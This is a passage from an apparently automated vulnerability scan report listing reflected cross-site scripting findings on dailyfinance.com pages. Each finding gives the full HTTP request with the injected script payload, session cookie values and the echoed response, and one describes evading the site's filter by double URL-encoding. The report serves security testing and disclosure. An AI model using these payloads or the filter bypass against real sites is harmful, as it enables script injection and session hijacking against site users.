Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of the icid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e3d0"><script>alert(1)</script>92573319bd0 was submitted in the icid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/stock-picks/face-off-on-stocks-disney-viacom-time-warner-video/19823676/?icid=videoModule|face-off-on-stocks-disney-viacom-time-warner-video/19823676/9e3d0"><script>alert(1)</script>92573319bd0 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of the icid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b919a"-alert(1)-"e05604ad8fb was submitted in the icid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/stock-picks/face-off-on-stocks-disney-viacom-time-warner-video/19823676/?icid=videoModule|face-off-on-stocks-disney-viacom-time-warner-video/19823676/b919a"-alert(1)-"e05604ad8fb HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... ; s_265.prop12="http://www.dailyfinance.com/story/stock-picks/face-off-on-stocks-disney-viacom-time-warner-video/19823676/?icid=videoModule|face-off-on-stocks-disney-viacom-time-warner-video/19823676/b919a"-alert(1)-"e05604ad8fb"; s_265.prop21="";
s_265.prop9="bsd:19823676";
s_265.prop19="Dan Burrows";
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElem ...[SNIP]...
1.466. http://www.dailyfinance.com/story/stock-picks/face-off-on-stocks-disney-viacom-time-warner-video/19823676/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1de5b"><script>alert(1)</script>396c399afc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/stock-picks/face-off-on-stocks-disney-viacom-time-warner-video/19823676/?1de5b"><script>alert(1)</script>396c399afc6=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/stock-picks/face-off-on-stocks-disney-viacom-time-warner-video/19823676/?1de5b"><script>alert(1)</script>396c399afc6=1" rel="nofollow"> ...[SNIP]...
1.467. http://www.dailyfinance.com/story/stock-picks/face-off-on-stocks-disney-viacom-time-warner-video/19823676/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd86b"-alert(1)-"9ca6721938c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/stock-picks/face-off-on-stocks-disney-viacom-time-warner-video/19823676/?cd86b"-alert(1)-"9ca6721938c=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createEl ...[SNIP]...
1.468. http://www.dailyfinance.com/story/stock-picks/inside-wall-street-where-to-bet-on-the-resurgence-in-energy-sto/19824458/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc759"><script>alert(1)</script>59711addbf2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/stock-picks/inside-wall-street-where-to-bet-on-the-resurgence-in-energy-sto/19824458/?fc759"><script>alert(1)</script>59711addbf2=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/stock-picks/inside-wall-street-where-to-bet-on-the-resurgence-in-energy-sto/19824458/?fc759"><script>alert(1)</script>59711addbf2=1" rel="nofollow"> ...[SNIP]...
1.469. http://www.dailyfinance.com/story/stock-picks/inside-wall-street-where-to-bet-on-the-resurgence-in-energy-sto/19824458/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afcd4"-alert(1)-"9e4fe1dd09a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/stock-picks/inside-wall-street-where-to-bet-on-the-resurgence-in-energy-sto/19824458/?afcd4"-alert(1)-"9e4fe1dd09a=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createE ...[SNIP]...
1.470. http://www.dailyfinance.com/story/streetwise/buzzword-of-the-week-accentuate-the-negative/19824425/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb969"-alert(1)-"4b39461a756 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/streetwise/buzzword-of-the-week-accentuate-the-negative/19824425/?cb969"-alert(1)-"4b39461a756=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createE ...[SNIP]...
1.471. http://www.dailyfinance.com/story/streetwise/buzzword-of-the-week-accentuate-the-negative/19824425/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4b67"><script>alert(1)</script>2e6423ca985 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/streetwise/buzzword-of-the-week-accentuate-the-negative/19824425/?d4b67"><script>alert(1)</script>2e6423ca985=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/streetwise/buzzword-of-the-week-accentuate-the-negative/19824425/?d4b67"><script>alert(1)</script>2e6423ca985=1" rel="nofollow"> ...[SNIP]...
1.472. http://www.dailyfinance.com/story/streetwise/steelers-packers-super-bowl-stock-market-indicator-bull-forecast/19829042/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b947f"><script>alert(1)</script>b231b87fb8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/streetwise/steelers-packers-super-bowl-stock-market-indicator-bull-forecast/19829042/?b947f"><script>alert(1)</script>b231b87fb8b=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/streetwise/steelers-packers-super-bowl-stock-market-indicator-bull-forecast/19829042/?b947f"><script>alert(1)</script>b231b87fb8b=1" rel="nofollow"> ...[SNIP]...
1.473. http://www.dailyfinance.com/story/streetwise/steelers-packers-super-bowl-stock-market-indicator-bull-forecast/19829042/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bc42"-alert(1)-"92c75e4f0b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/streetwise/steelers-packers-super-bowl-stock-market-indicator-bull-forecast/19829042/?1bc42"-alert(1)-"92c75e4f0b5=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.create ...[SNIP]...
1.474. http://www.dailyfinance.com/story/verizon-halts-iphone-4-pre-orders-tips-for-snagging-phone-next/19828811/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74642"><script>alert(1)</script>82d9cb7d101 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/verizon-halts-iphone-4-pre-orders-tips-for-snagging-phone-next/19828811/?74642"><script>alert(1)</script>82d9cb7d101=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/verizon-halts-iphone-4-pre-orders-tips-for-snagging-phone-next/19828811/?74642"><script>alert(1)</script>82d9cb7d101=1" rel="nofollow"> ...[SNIP]...
1.475. http://www.dailyfinance.com/story/verizon-halts-iphone-4-pre-orders-tips-for-snagging-phone-next/19828811/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 951b9"-alert(1)-"3e51c845def was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/verizon-halts-iphone-4-pre-orders-tips-for-snagging-phone-next/19828811/?951b9"-alert(1)-"3e51c845def=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.create ...[SNIP]...
1.476. http://www.dailyfinance.com/story/wall-street-pay-versus-most-americans/19825075/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99f08"-alert(1)-"76dd7b0a465 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/wall-street-pay-versus-most-americans/19825075/?99f08"-alert(1)-"76dd7b0a465=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createEl ...[SNIP]...
1.477. http://www.dailyfinance.com/story/wall-street-pay-versus-most-americans/19825075/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fff9"><script>alert(1)</script>082b41fd256 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/wall-street-pay-versus-most-americans/19825075/?3fff9"><script>alert(1)</script>082b41fd256=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/wall-street-pay-versus-most-americans/19825075/?3fff9"><script>alert(1)</script>082b41fd256=1" rel="nofollow"> ...[SNIP]...
1.478. http://www.dailyfinance.com/story/will-you-be-my-financially-responsible-valentine/19829277/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5515c"><script>alert(1)</script>b180374e1cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/will-you-be-my-financially-responsible-valentine/19829277/?5515c"><script>alert(1)</script>b180374e1cf=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/will-you-be-my-financially-responsible-valentine/19829277/?5515c"><script>alert(1)</script>b180374e1cf=1" rel="nofollow"> ...[SNIP]...
1.479. http://www.dailyfinance.com/story/will-you-be-my-financially-responsible-valentine/19829277/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65c49"-alert(1)-"788e2191648 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/will-you-be-my-financially-responsible-valentine/19829277/?65c49"-alert(1)-"788e2191648=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83743"><img%20src%3da%20onerror%3dalert(1)>4edc513783e was submitted in the REST URL parameter 2. This input was echoed as 83743"><img src=a onerror=alert(1)>4edc513783e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tag/madoff83743"><img%20src%3da%20onerror%3dalert(1)>4edc513783e/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 250ff%2522%253b66d481f60c1 was submitted in the REST URL parameter 2. This input was echoed as 250ff";66d481f60c1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/madoff250ff%2522%253b66d481f60c1/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
1.482. http://www.dailyfinance.com/tag/madoff/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /tag/madoff/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f1b0"-alert(1)-"c5b87a5d860 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag/madoff/?5f1b0"-alert(1)-"c5b87a5d860=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.483. http://www.dailyfinance.com/to-go/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /to-go/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69fff"-alert(1)-"73c848d5aee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /to-go/?69fff"-alert(1)-"73c848d5aee=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
